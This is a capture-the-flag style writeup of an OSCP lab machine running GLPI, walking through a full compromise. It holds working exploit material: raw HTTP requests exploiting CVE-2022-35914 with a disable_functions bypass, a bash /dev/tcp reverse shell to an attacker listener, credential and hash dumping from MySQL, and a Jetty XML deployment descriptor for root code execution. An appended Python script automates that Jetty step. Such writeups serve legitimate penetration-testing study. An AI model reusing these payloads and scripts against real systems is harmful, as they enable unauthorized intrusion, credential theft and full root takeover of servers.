OSCP Lab -- GLPI


Key points: CVE-2022-35914 (htmLawed RCE) with a bypass for a disabled PHP execution function + SSH local port forwarding + Jetty XML deployment-descriptor RCE

1. nmap scan

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.194.242 -sV -sC --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-26 22:22 EDT
Nmap scan report for 192.168.194.242
Host is up (0.37s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds

2. User privileges (foothold)

## Directory scan:
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.194.242
[22:26:05] 200 -   40KB - /CHANGELOG.md
## The directory scan exposes CHANGELOG.md; comparing it against upstream gives the installed GLPI version. The public exploits for that version need valid credentials, and weak/default password attempts against the login fail.
## A Google search turns up an unauthenticated RCE in the htmLawed test script that GLPI ships under vendor/ (CVE-2022-35914):
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/
## The PoC's exec hook returns nothing; phpinfo shows exec is listed in disable_functions:
┌──(root㉿kali)-[~/Desktop]
└─# curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://192.168.194.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'
## Since exec is disabled, switch the hook to array_map with text=call_user_func: htmLawed calls $config['hook']($text, $config, $spec), which becomes array_map('call_user_func', $config, $spec) and pairs config values with spec[] positionally, so the function supplied via hexec (passthru, still enabled) receives spec[1] as its argument. The target IP below differs from the nmap scan because these requests were captured in a later lab session:
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1

sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd
## Reverse shell (same chain, with system as the execution function and a listener on port 80, which the egress filter allows):
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1

sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=system&spec[0]=&spec[1]=bash -c 'bash -i >& /dev/tcp/192.168.45.171/80 0>&1'
## Database credentials in the GLPI config:
www-data@glpi:/var/www/glpi/config$ cat config_db.php
cat config_db.php
<?php
class DB extends DBmysql {
   public $dbhost = 'localhost';
   public $dbuser = 'glpi';
   public $dbpassword = 'glpi_db_password';
   public $dbdefault = 'glpi';
   public $use_utf8mb4 = true;
   public $allow_myisam = false;
   public $allow_datetime = false;
   public $allow_signed_keys = false;
}
## Upgrade the shell and connect to MySQL:
┌──(root㉿kali)-[~/Desktop]
└─# sudo rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.242] 40028
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ python3 -c 'import pty;pty.spawn("bash")'
<htmlawed$ python3 -c 'import pty;pty.spawn("bash")'  
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ 
zsh: suspended  sudo rlwrap -cAr nc -lvnp 80
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo; fg          
[1]  + continued  sudo rlwrap -cAr nc -lvnp 80
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ mysql -u glpi -p
mysql -u glpi -p
Enter password: glpi_db_password
Welcome to the MySQL monitor.  Commands end with ; or \g.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select id,name,password from glpi_users;
select id,name,password from glpi_users;
+----+-------------+--------------------------------------------------------------+
| id | name        | password                                                     |
+----+-------------+--------------------------------------------------------------+
|  2 | glpi        | $2y$10$9DbdMovtCw0eI.FWm18SRu34ErQD6LUzA8AqGUqiEat0S/ahlyHFa |
|  3 | post-only   | $2y$10$dTMar1F3ef5X/H1IjX9gYOjQWBR1K4bERGf4/oTPxFtJE/c3vXILm |
|  4 | tech        | $2y$10$.xEgErizkp6Az0z.DHyoeOoenuh0RcsX4JapBk2JMD6VI17KtB1lO |
|  5 | normal      | $2y$10$Z6doq4zVHkSPZFbPeXTCluN1Q/r0ryZ3ZsSJncJqkN3.8cRiN0NV. |
|  6 | glpi-system |                                                              |
|  7 | betty       | $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa |
+----+-------------+--------------------------------------------------------------+
6 rows in set (0.00 sec)
## cat /etc/passwd | grep -v nologin shows a local user betty, who also has a GLPI account:
## Crack betty's GLPI hash: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa
## Cracking fails: bcrypt at cost 10 runs at roughly 105 c/s on this machine, so rockyou alone would take about three days (see the ETA). Abandon it and look for the password elsewhere in the database instead:
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:57 0.33% (ETA: 2024-03-29 02:25) 0g/s 105.8p/s 105.8c/s 105.8C/s honda04..grethel
## Find every table in a schema that has a given column (useful for locating text/content columns that may hold credentials):
SELECT TABLE_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'your_column_name' AND TABLE_SCHEMA = 'your_database_name';
## Dumping the other tables turns up sensitive data in a ticket follow-up: betty:SnowboardSkateboardRoller234
mysql> select * from glpi_itilfollowups;
select * from glpi_itilfollowups;
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
| id | itemtype | items_id | date                | users_id | users_id_editor | content                                                                                                                                                                                                                                                 | is_private | requesttypes_id | date_mod            | date_creation       | timeline_position | sourceitems_id | sourceof_items_id |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
|  1 | Ticket   |        1 | 2022-10-08 20:57:14 |        2 |               0 | &#60;p&#62;Hello Betty,&#60;/p&#62;
&#60;p&#62;i changed your password to : SnowboardSkateboardRoller234&#60;/p&#62;
&#60;p&#62;Please change it again as soon as you can.&#60;/p&#62;
&#60;p&#62;regards.&#60;/p&#62;
&#60;p&#62;Lucas&#60;/p&#62; |          0 |               1 | 2022-10-08 20:57:14 | 2022-10-08 20:57:14 |                 4 |              0 |                 0 |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ su betty
su betty
Password: SnowboardSkateboardRoller234
$ id
id
uid=1000(betty) gid=1000(betty) groups=1000(betty)
$ whoami
whoami
betty
$ cat /home/betty/local.txt
cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0
$ 


3. Root privileges

## linpeas enumeration (listening ports):
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                 
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                                                             
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
## Port 8080 (Jetty) binds to 0.0.0.0, but the initial nmap showed it filtered from outside, so reach it through an SSH local port forward using betty's password (localhost:1234 on Kali -> 127.0.0.1:8080 on the target):
ssh -L 1234:localhost:8080 betty@192.168.178.242 -N
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce
## Jetty's deploy scanner treats any *.xml dropped into the webapps directory as a context descriptor and evaluates its <Call> elements, so a writable webapps directory gives code execution as the user running Jetty (root here). Drop in an XML that runs a script of our own (template below):
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
  <Call class="java.lang.Runtime" name="getRuntime">
    <Call name="exec">
      <Arg><Array type="String"><Item>/tmp/root.sh</Item></Array></Arg>
    </Call>
  </Call>
</Configure>
betty@glpi:/opt/jetty/jetty-base$ echo "chmod +s /bin/bash" > /tmp/root.sh
echo "chmod +s /bin/bash" > /tmp/root.sh
betty@glpi:/opt/jetty/jetty-base$ chmod +x /tmp/root.sh
## Write the XML into Jetty's webapps deploy directory (fetched from the Kali web server):
$ wget http://192.168.45.171/rooted.xml
--2024-03-27 11:02:54--  http://192.168.45.171/rooted.xml
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 464 [application/xml]
Saving to: ‘rooted.xml’
rooted.xml                         100%[=============================================================>]     464  --.-KB/s    in 0s      
2024-03-27 11:02:55 (27.4 MB/s) - ‘rooted.xml’ saved [464/464]
$ ls
rooted.xml  root.xml
$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
$ bash -p
bash-5.0# id
uid=1000(betty) gid=1000(betty) euid=0(root) egid=0(root) groups=0(root),1000(betty)
bash-5.0# cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0
bash-5.0# cat /root/proof.txt
1063fa4253b657156458c71f4a7847b7
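The Jetty step above is three manual actions (write the helper script, craft the XML, drop it into webapps, then watch for the setuid bit). The following is an added example, not code from the writeup, Jetty or the JettyShell.xml template: it generates the same Runtime.exec descriptor for an arbitrary argv with proper XML escaping, writes it into a webapps directory and polls for the side effect. The directory /opt/jetty/jetty-base/webapps, the script path /tmp/root.sh and the 60-second timeout are assumptions; the deploy scanner's interval decides how long the wait actually is.

```python
"""Added example for the Jetty XML step above (not from the writeup or Jetty).

Builds the deployment descriptor that makes Jetty call
Runtime.getRuntime().exec(String[]) on deploy, writes it into webapps/, and
polls for the result (here: /bin/bash gaining the setuid bit, as root.sh does
in the writeup). Paths and timeout are assumptions.
"""
import os
import stat
import time
from xml.sax.saxutils import escape

JETTY_DTD = "https://www.eclipse.org/jetty/configure_10_0.dtd"


def build_jetty_xml(argv: list) -> str:
    """Jetty XML that runs argv via Runtime.exec when the descriptor is deployed.

    Every *.xml in webapps/ is evaluated as a context descriptor, and <Call>
    elements may invoke static methods on any class the server can load.
    Each argv element becomes one <Item>, XML-escaped, so no shell quoting
    is involved: pass ["sh", "-c", "..."] if shell syntax is needed.
    """
    items = "".join(f"<Item>{escape(a)}</Item>" for a in argv)
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "{JETTY_DTD}">\n'
        '<Configure class="org.eclipse.jetty.server.handler.ContextHandler">\n'
        '  <Call class="java.lang.Runtime" name="getRuntime">\n'
        '    <Call name="exec">\n'
        f'      <Arg><Array type="String">{items}</Array></Arg>\n'
        '    </Call>\n'
        '  </Call>\n'
        '</Configure>\n'
    )


def is_setuid(path: str) -> bool:
    """True if the file carries the setuid bit (the 'rws' that ls -al showed)."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def deploy_and_wait(webapps_dir: str, xml_name: str, argv: list,
                    check_path: str, timeout: float = 60.0,
                    interval: float = 2.0) -> bool:
    """Write the descriptor, then poll until check_path is setuid or we time out."""
    os.makedirs(webapps_dir, exist_ok=True)
    with open(os.path.join(webapps_dir, xml_name), "w") as f:
        f.write(build_jetty_xml(argv))
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if is_setuid(check_path):
            return True
        time.sleep(interval)
    return is_setuid(check_path)


if __name__ == "__main__":
    # Assumed layout from the writeup: /tmp/root.sh contains "chmod +s /bin/bash".
    ok = deploy_and_wait("/opt/jetty/jetty-base/webapps", "rooted.xml",
                         ["/tmp/root.sh"], "/bin/bash")
    print("setuid bash present, run: bash -p" if ok
          else "timed out: check the deploy scan interval and Jetty's log")
```

The helper script is still needed because Runtime.exec does not go through a shell: putting `chmod +s /bin/bash` directly in argv would require `["chmod", "+s", "/bin/bash"]` as three items, which the escaping in build_jetty_xml also handles.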


4. Summary

## Writeups:
https://medium.com/@ardian.danny/oscp-practice-series-17-proving-grounds-glpi-555ce2d9234e
https://r4j3sh.medium.com/glpi-pg-practice-writeup-853aff88151f
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------
